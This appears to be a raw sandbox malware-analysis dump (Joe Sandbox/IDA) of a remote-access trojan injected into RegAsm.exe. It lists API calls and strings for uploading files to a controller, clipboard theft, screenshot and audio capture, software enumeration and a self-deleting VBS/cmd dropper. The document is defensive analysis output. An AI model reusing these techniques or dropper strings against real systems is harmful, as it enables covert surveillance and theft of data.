                                                  Similarity
                                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                  • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                  • API String ID: 2649220323-436679193
                                                  APIs
                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                  • SetEvent.KERNEL32 ref: 0041B2AA
                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                  • CloseHandle.KERNEL32 ref: 0041B2CB
                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                  • API String ID: 738084811-2094122233
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                  • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                  • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                  • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Write$Create
                                                  • String ID: RIFF$WAVE$data$fmt
                                                  • API String ID: 1602526932-4212202414
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0040CE42
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                  • CopyFileW.KERNEL32 ref: 0040CF0B
                                                  • _wcslen.LIBCMT ref: 0040CF21
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                  • CopyFileW.KERNEL32 ref: 0040CFBF
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                  • _wcslen.LIBCMT ref: 0040D001
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                  • CloseHandle.KERNEL32 ref: 0040D068
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                  • ExitProcess.KERNEL32 ref: 0040D09D
                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                  • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                  APIs
                                                  • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                  • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                  • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                  • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                  • _wcslen.LIBCMT ref: 0041C1CC
                                                  • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                  • GetLastError.KERNEL32 ref: 0041C204
                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                  • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                  • GetLastError.KERNEL32 ref: 0041C261
                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                  • String ID: ?
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636D1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                  • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                  • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                  • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                  • String ID: /stext "$0TG$0TG$NG$NG
                                                  APIs
                                                  • API ID: _free$EnvironmentVariable
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                  • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                  • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                  • API ID: CloseEnumOpen
                                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                  • GetCursorPos.USER32(?), ref: 0041D67A
                                                  • SetForegroundWindow.USER32(?), ref: 0041D683
                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                  • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                  • ExitProcess.KERNEL32 ref: 0041D6F6
                                                  • CreatePopupMenu.USER32 ref: 0041D6FC
                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                  • String ID: Close
                                                  APIs
                                                  • API ID: _free$Info
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                  • __aulldiv.LIBCMT ref: 00408D88
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                  • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                  • _free.LIBCMT ref: 0045137F
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 004513A1
                                                  • _free.LIBCMT ref: 004513B6
                                                  • _free.LIBCMT ref: 004513C1
                                                  • _free.LIBCMT ref: 004513E3
                                                  • _free.LIBCMT ref: 004513F6
                                                  • _free.LIBCMT ref: 00451404
                                                  • _free.LIBCMT ref: 0045140F
                                                  • _free.LIBCMT ref: 00451447
                                                  • _free.LIBCMT ref: 0045144E
                                                  • _free.LIBCMT ref: 0045146B
                                                  • _free.LIBCMT ref: 00451483
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0041A04A
                                                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                  • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                  • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                    • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                    • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                                    • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                  • ExitProcess.KERNEL32 ref: 0040D9FF
                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                  • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                  APIs
                                                  • API ID: _free
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                  • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                  • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                  • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                  • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                  • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                  • String ID:
                                                  • API String ID: 3658366068-0
                                                  • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                  • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                  • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                  • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                                  APIs
                                                    • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                                  • GetLastError.KERNEL32 ref: 00455D6F
                                                  • __dosmaperr.LIBCMT ref: 00455D76
                                                  • GetFileType.KERNEL32 ref: 00455D82
                                                  • GetLastError.KERNEL32 ref: 00455D8C
                                                  • __dosmaperr.LIBCMT ref: 00455D95
                                                  • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                  • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                  • GetLastError.KERNEL32 ref: 00455F31
                                                  • __dosmaperr.LIBCMT ref: 00455F38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                  • String ID: H
                                                  • API String ID: 4237864984-2852464175
                                                  • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                  • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                  • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                  • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: \&G$\&G$`&G
                                                  • API String ID: 269201875-253610517
                                                  • Opcode ID: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                  • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                  • Opcode Fuzzy Hash: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                  • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 65535$udp
                                                  • API String ID: 0-1267037602
                                                  • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                  • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                  • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                  • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                  • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                  • __dosmaperr.LIBCMT ref: 0043A926
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                  • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                  • __dosmaperr.LIBCMT ref: 0043A963
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                  • __dosmaperr.LIBCMT ref: 0043A9B7
                                                  • _free.LIBCMT ref: 0043A9C3
                                                  • _free.LIBCMT ref: 0043A9CA
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                  • String ID:
                                                  • API String ID: 2441525078-0
                                                  • Opcode ID: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                  • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                  • Opcode Fuzzy Hash: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                  • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                  • GetMessageA.USER32 ref: 0040556F
                                                  • TranslateMessage.USER32(?), ref: 0040557E
                                                  • DispatchMessageA.USER32(?), ref: 00405589
                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                  • API String ID: 2956720200-749203953
                                                  • Opcode ID: 8bf319eff18f9cbbe9b5f0af86abf83c791be4b498861229a483a29bb5c83ecd
                                                  • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                  • Opcode Fuzzy Hash: 8bf319eff18f9cbbe9b5f0af86abf83c791be4b498861229a483a29bb5c83ecd
                                                  • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                  APIs
                                                    • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                  • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                  • String ID: 0VG$0VG$<$@$Temp
                                                  • API String ID: 1704390241-2575729100
                                                  • Opcode ID: fdfef061a0c845b66634ed9213ec91d51d63ab98c4c1b6a43026fae5df42adc0
                                                  • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                  • Opcode Fuzzy Hash: fdfef061a0c845b66634ed9213ec91d51d63ab98c4c1b6a43026fae5df42adc0
                                                  • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 0041697C
                                                  • EmptyClipboard.USER32 ref: 0041698A
                                                  • CloseClipboard.USER32 ref: 00416990
                                                  • OpenClipboard.USER32 ref: 00416997
                                                  • GetClipboardData.USER32 ref: 004169A7
                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                  • CloseClipboard.USER32 ref: 004169BF
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                  • String ID: !D@
                                                  • API String ID: 2172192267-604454484
                                                  • Opcode ID: d45687c870201b0dabbd41d7f1757c88dbe4de035b9da3459f2691080a45fbe1
                                                  • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                  • Opcode Fuzzy Hash: d45687c870201b0dabbd41d7f1757c88dbe4de035b9da3459f2691080a45fbe1
                                                  • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                  APIs
                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                  • CloseHandle.KERNEL32(?), ref: 004134A0
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                  • String ID:
                                                  • API String ID: 297527592-0
                                                  • Opcode ID: 33a11f1d8b65504666c7f3d6a65dc1c7f241de2952f14d7c983c905d35a598f5
                                                  • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                  • Opcode Fuzzy Hash: 33a11f1d8b65504666c7f3d6a65dc1c7f241de2952f14d7c983c905d35a598f5
                                                  • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                  • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                  • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
